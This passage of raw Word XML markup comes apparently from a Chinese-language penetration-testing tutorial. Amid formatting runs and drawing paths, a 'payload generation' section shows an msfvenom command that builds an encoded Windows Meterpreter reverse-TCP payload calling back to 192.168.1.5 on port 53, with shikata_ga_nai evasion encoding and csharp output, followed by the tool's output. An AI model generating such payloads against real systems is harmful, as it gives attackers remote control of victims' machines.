          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-z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4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payloa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d生成：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="295" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="2471" w:firstLine="0"/>
      </w:pP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root@John:/tmp#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msfvenom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-a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x86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-p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pacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp_uuid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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LHOST=192.168.1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LPORT=53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>EnableStageEncoding=true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stageencoder=x86/shikata_ga_nai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-24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-e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-24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4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-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-24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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-2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-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-25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csharp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/usr/share/metasploit-framework/lib/msf/core/opt.rb:55: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warning:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-1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constant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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OpenSSL::SSL::SSLContext::METHODS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17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>is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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>deprecated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="4" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="1631" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>No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platform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was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selected,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choosing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Msf::Module::Platform::Windows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from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the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payload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Found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8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> 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compatible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> 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encoders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="3300" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Attempting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-1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to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-1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encode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-1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payload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1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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-16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iterations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of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000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succeeded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401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(iteration=0)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succeeded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428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(iteration=1)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succeeded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455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(iteration=2)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succeeded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482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(iteration=3)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succeeded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509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(iteration=4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>x86/shikata_ga_nai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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>chosen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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>with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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>509</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="6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5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>size:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>509</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bytes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8.874pt;margin-top:49.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,997" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:997;width:82;height:322" coordorigin="1177,997" coordsize="82,322" path="m1217,1000l1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1001,1217,1001,1217,1001,1217,1001,1217,1001,1217,1002,1217,1002,1217,1002,1217,1003,1217,1003,1217,1003,1217,1004,1217,1004,1217,1005,1217,1005,1217,1006,1217,1007,1217,1007,1217,1008,1217,1009,1217,1009,1217,1010,1217,1011,1217,1012,1217,1013,1217,1014,1217,1015,1217,1016,1217,1017,1217,1018,1217,1019,1217,1020,1217,1022,1217,1023,1217,1025,1217,1026,1217,1028,1217,1029,1217,1031,1217,1032,1217,1034,1217,1036,1217,1038,1217,1040,1217,1042,1217,1044,1217,1046,1217,1048,1217,1051,1217,1053,1217,1056,1217,1058,1217,1061,1217,1063,1217,1066,1217,1069,1217,1072,1217,1075,1217,1078,1217,1081,1217,1084,1217,1087,1217,1091,1217,1094,1217,1098,1217,1101,1217,1105,1217,1109,1217,1113,1217,1117,1217,1121,1217,1125,1217,1129,1217,1134,1217,1138,1217,1143,1217,1147,1217,1152,1217,1157,1217,1162,1217,1167,1217,1172,1217,1178,1217,1183,1217,1189,1217,1194,1217,1200,1217,1206,1217,1212,1217,1218,1217,1224,1217,1230,1217,1237,1217,1243,1217,1250,1217,1257,1217,1263,1217,1270,1217,1278,1217,1285,1217,1292,1217,1300e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:64.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,1297" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:1297;width:82;height:322" coordorigin="1177,1297" coordsize="82,322" path="m1217,1300l1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1301,1217,1301,1217,1301,1217,1301,1217,1301,1217,1302,1217,1302,1217,1302,1217,1302,1217,1303,1217,1303,1217,1304,1217,1304,1217,1304,1217,1305,1217,1305,1217,1306,1217,1307,1217,1307,1217,1308,1217,1309,1217,1309,1217,1310,1217,1311,1217,1312,1217,1313,1217,1314,1217,1315,1217,1316,1217,1317,1217,1318,1217,1319,1217,1321,1217,1322,1217,1323,1217,1325,1217,1326,1217,1328,1217,1329,1217,1331,1217,1333,1217,1334,1217,1336,1217,1338,1217,1340,1217,1342,1217,1344,1217,1346,1217,1349,1217,1351,1217,1353,1217,1356,1217,1358,1217,1361,1217,1363,1217,1366,1217,1369,1217,1372,1217,1375,1217,1378,1217,1381,1217,1384,1217,1387,1217,1391,1217,1394,1217,1398,1217,1401,1217,1405,1217,1409,1217,1413,1217,1417,1217,1421,1217,1425,1217,1429,1217,1434,1217,1438,1217,1443,1217,1448,1217,1452,1217,1457,1217,1462,1217,1467,1217,1472,1217,1478,1217,1483,1217,1489,1217,1494,1217,1500,1217,1506,1217,1512,1217,1518,1217,1524,1217,1530,1217,1537,1217,1543,1217,1550,1217,1557,1217,1564,1217,1571,1217,1578,1217,1585,1217,1592,1217,1600e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:79.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,1597" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:1597;width:82;height:322" coordorigin="1177,1597" coordsize="82,322" path="m1217,1600l1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1601,1217,1601,1217,1601,1217,1601,1217,1601,1217,1601,1217,1602,1217,1602,1217,1602,1217,1603,1217,1603,1217,1603,1217,1604,1217,1604,1217,1605,1217,1605,1217,1606,1217,1606,1217,1607,1217,1607,1217,1608,1217,1609,1217,1610,1217,1610,1217,1611,1217,1612,1217,1613,1217,1614,1217,1615,1217,1616,1217,1617,1217,1618,1217,1620,1217,1621,1217,1622,1217,1623,1217,1625,1217,1626,1217,1628,1217,1629,1217,1631,1217,1633,1217,1635,1217,1636,1217,1638,1217,1640,1217,1642,1217,1644,1217,1646,1217,1649,1217,1651,1217,1653,1217,1656,1217,1658,1217,1661,1217,1664,1217,1666,1217,1669,1217,1672,1217,1675,1217,1678,1217,1681,1217,1684,1217,1688,1217,1691,1217,1694,1217,1698,1217,1702,1217,1705,1217,1709,1217,1713,1217,1717,1217,1721,1217,1725,1217,1730,1217,1734,1217,1739,1217,1743,1217,1748,1217,1753,1217,1757,1217,1762,1217,1767,1217,1773,1217,1778,1217,1783,1217,1789,1217,1794,1217,1800,1217,1806,1217,1812,1217,1818,1217,1824,1217,1830,1217,1837,1217,1843,1217,1850,1217,1857,1217,1864,1217,1871,1217,1878,1217,1885,1217,1892,1217,1900e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:94.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,1897" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:1897;width:82;height:322" coordorigin="1177,1897" coordsize="82,322" path="m1217,1900l1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1901,1217,1901,1217,1901,1217,1901,1217,1901,1217,1901,1217,1902,1217,1902,1217,1902,1217,1902,1217,1903,1217,1903,1217,1903,1217,1904,1217,1904,1217,1905,1217,1905,1217,1906,1217,1906,1217,1907,1217,1908,1217,1908,1217,1909,1217,1910,1217,1911,1217,1911,1217,1912,1217,1913,1217,1914,1217,1915,1217,1916,1217,1917,1217,1918,1217,1920,1217,1921,1217,1922,1217,1924,1217,1925,1217,1926,1217,1928,1217,1930,1217,1931,1217,1933,1217,1935,1217,1937,1217,1938,1217,1940,1217,1942,1217,1944,1217,1947,1217,1949,1217,1951,1217,1954,1217,1956,1217,1958,1217,1961,1217,1964,1217,1966,1217,1969,1217,1972,1217,1975,1217,1978,1217,1981,1217,1984,1217,1988,1217,1991,1217,1995,1217,1998,1217,2002,1217,2006,1217,2009,1217,2013,1217,2017,1217,2021,1217,2026,1217,2030,1217,2034,1217,2039,1217,2043,1217,2048,1217,2053,1217,2058,1217,2063,1217,2068,1217,2073,1217,2078,1217,2083,1217,2089,1217,2095,1217,2100,1217,2106,1217,2112,1217,2118,1217,2124,1217,2131,1217,2137,1217,2144,1217,2150,1217,2157,1217,2164,1217,2171,1217,2178,1217,2185,1217,2193,1217,2200e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:109.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,2197" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:2197;width:82;height:322" coordorigin="1177,2197" coordsize="82,322" path="m1217,2200l1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2201,1217,2201,1217,2201,1217,2201,1217,2201,1217,2201,1217,2202,1217,2202,1217,2202,1217,2202,1217,2203,1217,2203,1217,2203,1217,2204,1217,2204,1217,2204,1217,2205,1217,2205,1217,2206,1217,2207,1217,2207,1217,2208,1217,2208,1217,2209,1217,2210,1217,2211,1217,2212,1217,2212,1217,2213,1217,2214,1217,2215,1217,2216,1217,2217,1217,2219,1217,2220,1217,2221,1217,2222,1217,2224,1217,2225,1217,2227,1217,2228,1217,2230,1217,2231,1217,2233,1217,2235,1217,2237,1217,2239,1217,2241,1217,2243,1217,2245,1217,2247,1217,2249,1217,2251,1217,2254,1217,2256,1217,2259,1217,2261,1217,2264,1217,2267,1217,2269,1217,2272,1217,2275,1217,2278,1217,2281,1217,2285,1217,2288,1217,2291,1217,2295,1217,2298,1217,2302,1217,2306,1217,2309,1217,2313,1217,2317,1217,2321,1217,2326,1217,2330,1217,2334,1217,2339,1217,2343,1217,2348,1217,2353,1217,2358,1217,2363,1217,2368,1217,2373,1217,2378,1217,2384,1217,2389,1217,2395,1217,2400,1217,2406,1217,2412,1217,2418,1217,2424,1217,2431,1217,2437,1217,2444,1217,2450,1217,2457,1217,2464,1217,2471,1217,2478,1217,2485,1217,2493,1217,2500e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:124.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,2497" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:2497;width:82;height:322" coordorigin="1177,2497" coordsize="82,322" path="m1217,2500l1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2501,1217,2501,1217,2501,1217,2501,1217,2501,1217,2501,1217,2501,1217,2501,1217,2502,1217,2502,1217,2502,1217,2502,1217,2503,1217,2503,1217,2503,1217,2504,1217,2504,1217,2505,1217,2505,1217,2506,1217,2506,1217,2507,1217,2507,1217,2508,1217,2509,1217,2509,1217,2510,1217,2511,1217,2512,1217,2513,1217,2513,1217,2514,1217,2515,1217,2516,1217,2518,1217,2519,1217,2520,1217,2521,1217,2523,1217,2524,1217,2525,1217,2527,1217,2528,1217,2530,1217,2532,1217,2533,1217,2535,1217,2537,1217,2539,1217,2541,1217,2543,1217,2545,1217,2547,1217,2549,1217,2551,1217,2554,1217,2556,1217,2559,1217,2561,1217,2564,1217,2567,1217,2570,1217,2572,1217,2575,1217,2578,1217,2582,1217,2585,1217,2588,1217,2591,1217,2595,1217,2598,1217,2602,1217,2606,1217,2610,1217,2614,1217,2618,1217,2622,1217,2626,1217,2630,1217,2634,1217,2639,1217,2644,1217,2648,1217,2653,1217,2658,1217,2663,1217,2668,1217,2673,1217,2678,1217,2684,1217,2689,1217,2695,1217,2701,1217,2706,1217,2712,1217,2718,1217,2725,1217,2731,1217,2737,1217,2744,1217,2750,1217,2757,1217,2764,1217,2771,1217,2778,1217,2786,1217,2793,1217,2800e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:139.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,2797" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:2797;width:82;height:322" coordorigin="1177,2797" coordsize="82,322" path="m1217,2800l1217,2800,1217,2800,1217,2800,1217,2800,1217,2800,1217,2800,1217,2800,1217,2800,1217,2801,1217,2801,1217,2801,1217,2801,1217,2801,1217,2801,1217,2801,1217,2801,1217,2801,1217,2801,1217,2801,1217,2802,1217,2802,1217,2802,1217,2802,1217,2803,1217,2803,1217,2803,1217,2804,1217,2804,1217,2804,1217,2805,1217,2805,1217,2806,1217,2806,1217,2807,1217,2807,1217,2808,1217,2809,1217,2809,1217,2810,1217,2811,1217,2812,1217,2813,1217,2814,1217,2815,1217,2816,1217,2817,1217,2818,1217,2819,1217,2820,1217,2821,1217,2823,1217,2824,1217,2825,1217,2827,1217,2828,1217,2830,1217,2832,1217,2833,1217,2835,1217,2837,1217,2839,1217,2841,1217,2843,1217,2845,1217,2847,1217,2849,1217,2852,1217,2854,1217,2856,1217,2859,1217,2862,1217,2864,1217,2867,1217,2870,1217,2873,1217,2876,1217,2879,1217,2882,1217,2885,1217,2888,1217,2892,1217,2895,1217,2899,1217,2902,1217,2906,1217,2910,1217,2914,1217,2918,1217,2922,1217,2926,1217,2930,1217,2935,1217,2939,1217,2944,1217,2948,1217,2953,1217,2958,1217,2963,1217,2968,1217,2973,1217,2979,1217,2984,1217,2989,1217,2995,1217,3001,1217,3007,1217,3013,1217,3019,1217,3025,1217,3031,1217,3037,1217,3044,1217,3051,1217,3057,1217,3064,1217,3071,1217,3078,1217,3086,1217,3093,1217,3101e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:154.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,3097" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:3097;width:82;height:322" coordorigin="1177,3097" coordsize="82,322" path="m1217,3101l1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3102,1217,3102,1217,3102,1217,3102,1217,3102,1217,3103,1217,3103,1217,3103,1217,3104,1217,3104,1217,3104,1217,3105,1217,3105,1217,3106,1217,3106,1217,3107,1217,3108,1217,3108,1217,3109,1217,3110,1217,3110,1217,3111,1217,3112,1217,3113,1217,3114,1217,3115,1217,3116,1217,3117,1217,3118,1217,3119,1217,3120,1217,3122,1217,3123,1217,3124,1217,3126,1217,3127,1217,3129,1217,3130,1217,3132,1217,3134,1217,3135,1217,3137,1217,3139,1217,3141,1217,3143,1217,3145,1217,3147,1217,3149,1217,3152,1217,3154,1217,3157,1217,3159,1217,3162,1217,3164,1217,3167,1217,3170,1217,3173,1217,3176,1217,3179,1217,3182,1217,3185,1217,3188,1217,3192,1217,3195,1217,3199,1217,3202,1217,3206,1217,3210,1217,3214,1217,3218,1217,3222,1217,3226,1217,3230,1217,3235,1217,3239,1217,3244,1217,3249,1217,3253,1217,3258,1217,3263,1217,3268,1217,3273,1217,3279,1217,3284,1217,3290,1217,3295,1217,3301,1217,3307,1217,3313,1217,3319,1217,3325,1217,3331,1217,3338,1217,3344,1217,3351,1217,3358,1217,3364,1217,3371,1217,3379,1217,3386,1217,3393,1217,3401e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:169.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,3397" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:3397;width:82;height:322" coordorigin="1177,3397" coordsize="82,322" path="m1217,3401l1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3402,1217,3402,1217,3402,1217,3402,1217,3402,1217,3403,1217,3403,1217,3403,1217,3403,1217,3404,1217,3404,1217,3405,1217,3405,1217,3406,1217,3406,1217,3407,1217,3407,1217,3408,1217,3408,1217,3409,1217,3410,1217,3410,1217,3411,1217,3412,1217,3413,1217,3414,1217,3415,1217,3416,1217,3417,1217,3418,1217,3419,1217,3420,1217,3422,1217,3423,1217,3424,1217,3426,1217,3427,1217,3429,1217,3430,1217,3432,1217,3434,1217,3435,1217,3437,1217,3439,1217,3441,1217,3443,1217,3445,1217,3447,1217,3450,1217,3452,1217,3454,1217,3457,1217,3459,1217,3462,1217,3464,1217,3467,1217,3470,1217,3473,1217,3476,1217,3479,1217,3482,1217,3485,1217,3489,1217,3492,1217,3495,1217,3499,1217,3503,1217,3506,1217,3510,1217,3514,1217,3518,1217,3522,1217,3526,1217,3531,1217,3535,1217,3539,1217,3544,1217,3549,1217,3553,1217,3558,1217,3563,1217,3568,1217,3574,1217,3579,1217,3584,1217,3590,1217,3595,1217,3601,1217,3607,1217,3613,1217,3619,1217,3625,1217,3631,1217,3638,1217,3644,1217,3651,1217,3658,1217,3665,1217,3672,1217,3679,1217,3686,1217,3693,1217,3701e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:184.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,3697" coordsize="82,322">
